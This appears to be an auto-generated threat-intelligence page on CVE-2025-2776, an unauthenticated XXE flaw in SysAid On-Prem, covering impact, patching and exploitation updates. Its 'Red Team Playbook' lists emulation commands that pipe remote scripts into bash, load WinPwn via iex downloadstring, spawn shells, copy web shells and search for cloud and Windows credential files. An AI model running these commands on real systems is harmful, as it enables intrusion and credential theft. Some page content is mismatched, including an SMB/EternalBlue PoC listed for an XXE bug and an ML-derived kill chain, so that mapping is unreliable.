CVE-2025-2776
Overview
This vulnerability is an XML External Entity (XXE) flaw rooted in improper parsing of XML input within the Server URL processing functionality of SysAid On-Prem. The affected component fails to securely handle external entity references in XML payloads, allowing malicious XML data to be processed without validation. This insecure XML parser configuration affects SysAid On-Prem versions up to and including 23.3.40.
Vulnerability Description
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Impact
An unauthenticated attacker can exploit this XXE vulnerability to read arbitrary files on the server, including sensitive configuration and credential files. This file disclosure can lead to administrator account takeover by extracting secrets or session data. The vulnerability enables full system compromise through privilege escalation and lateral movement within the affected environment. No user interaction or prior access is required to exploit this flaw, exposing organizations to data breaches and operational disruption.
Solution
SysAid has released patches addressing this vulnerability in versions later than 23.3.40. Administrators should upgrade to the latest available version as documented in the vendor advisory at https://documentation.sysaid.com/docs/24-40-60. The advisory provides detailed instructions for patch application and version verification. No alternative workarounds are specified; applying the vendor-provided update is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in certain versions of SysAid On-Prem software involves an unauthenticated XML External Entity (XXE) flaw that can be exploited through improper handling of XML input. This type of vulnerability arises when an application processes XML input without adequately validating or sanitizing it, allowing attackers to manipulate the XML data structure. Specifically, the Server URL processing functionality is susceptible to this attack, which can lead to significant security breaches, including unauthorized access to sensitive files and potential takeover of administrator accounts. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk that organizations must address promptly.
Attackers can exploit this vulnerability through various vectors, primarily by sending specially crafted XML requests to the affected application. Since the vulnerability allows for unauthenticated access, an attacker does not need valid credentials to initiate the attack. Once the malicious XML is processed, the attacker can leverage the XXE flaw to read sensitive files on the server, such as configuration files, which may contain credentials or other critical information. Furthermore, by manipulating the XML data, an attacker could potentially escalate privileges and gain control over administrator accounts, leading to a complete compromise of the system. This exploitation scenario highlights the ease with which an attacker can gain unauthorized access, making it a significant threat to organizations using the affected software.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on SysAid for IT service management. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and loss of customer trust. The ability to take over administrator accounts could enable attackers to manipulate system settings, access confidential information, and even deploy further attacks within the organization’s network. The business risks associated with this vulnerability include potential financial losses, regulatory penalties, and reputational damage, all of which can have long-lasting effects on an organization’s operations and credibility.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted security strategy. Regularly updating the SysAid software to the latest version is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments, including penetration testing and code reviews, to identify and remediate potential weaknesses in their systems. Employing web application firewalls (WAFs) can also help filter out malicious XML requests before they reach the application. Furthermore, implementing strict input validation and sanitization measures can significantly reduce the risk of XXE vulnerabilities by ensuring that only safe and expected XML data is processed.
In conclusion, the unauthenticated XML External Entity vulnerability in SysAid On-Prem software presents a critical security risk that organizations must take seriously. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate action to protect sensitive data and maintain system integrity. By adopting proactive detection and mitigation strategies, organizations can safeguard themselves against this and similar vulnerabilities, ensuring a more secure operational environment.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-2776, with telemetry indicating a doubling of observed activity over a short period. This surge underscores increasing adversary interest and operationalization of the vulnerability, despite the slight downward revision of the CVSS score to 9.3. The continued high EPSS score and stable trend suggest that the vulnerability remains a prime target for attackers seeking unauthenticated access to SysAid On-Prem environments. Notably, new proof-of-concept exploits have surfaced, demonstrating refined attack chains that enhance the potential for administrator account takeover and sensitive file disclosure. This evolution in exploit sophistication elevates the threat landscape, signaling that defenders must anticipate more frequent and complex intrusion attempts. While ransomware usage linked to this vulnerability remains unconfirmed, the growing exploitation activity heightens the risk of its incorporation into broader attack campaigns. Consequently, the overall threat level remains critical, with the increased exploitation momentum amplifying the urgency for vigilant detection and response capabilities.
Update 2 — May 23, 2026
CSURFACE threat intelligence has identified the inclusion of CVE-2025-2776 in the Known Exploited Vulnerabilities (KEV) catalog as of July 22, 2025, with a due remediation date set for August 12, 2025. This formal recognition underscores the vulnerability’s elevated priority within the cybersecurity community and mandates accelerated mitigation efforts by affected organizations. Concurrently, the CVSS base score has been revised upward from 9.3 to 9.8, reflecting a reassessment of the vulnerability’s impact and exploitability, particularly emphasizing its critical potential for unauthenticated administrator account takeover and file disclosure. Our telemetry indicates that while exploitation activity remains stable, the vulnerability ranks in the 98th percentile of EPSS scores, signaling a high likelihood of exploitation attempts in the near term. Additionally, new proof-of-concept exploits have surfaced, illustrating advanced attack chains that leverage this vulnerability to achieve full reverse-shell capabilities, thereby increasing the sophistication and stealth of potential intrusions. Although ransomware usage linked to this vulnerability remains unconfirmed, the heightened exploitation momentum and integration into complex attack frameworks amplify the overall threat level. Defenders should interpret these developments as a clear indication that CVE-2025-2776 poses an imminent and severe risk, necessitating sustained vigilance and prioritization in detection and response strategies.
Update 3 — June 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-2776, accompanied by a significant uptick in the Exploit Prediction Scoring System (EPSS) metric. This upward trend in telemetry indicates that threat actors are increasingly prioritizing this vulnerability within their attack frameworks. Notably, the rise in detection activity aligns with the recent addition of CVE-2025-2776 to the Known Exploited Vulnerabilities (KEV) catalog, which may be driving adversaries to accelerate weaponization efforts. Although ransomware usage linked to this vulnerability remains unconfirmed, the growing exploitation momentum and integration into sophisticated attack chains underscore an elevated risk of widespread compromise. For defenders, this evolving landscape signals an urgent need to enhance monitoring and response capabilities, as the vulnerability’s exploitation is becoming more frequent and potentially more impactful. Consequently, the threat level associated with CVE-2025-2776 should be considered heightened, reflecting its increasing attractiveness to adversaries and the expanding scope of its operational use.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sysaid | Sysaid | All |
cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mrk336/From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack
It shook the world in 2017 and has evolved into today’s CVE‑2025‑2776. Microsoft still relies on SMBv1, this article wil...
|
mrk336 | 0 | 0 | 2025-08-31 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-221 | Data Serialization External Entities Blowup |
34%
|
— | — |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-2776 |
| documentation.sysaid.com |
GitHub CVE
vendor-advisory
|
https://documentation.sysaid.com/docs/24-40-60 |
| labs.watchtowr.com |
GitHub CVE
exploit
|
https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-2776 |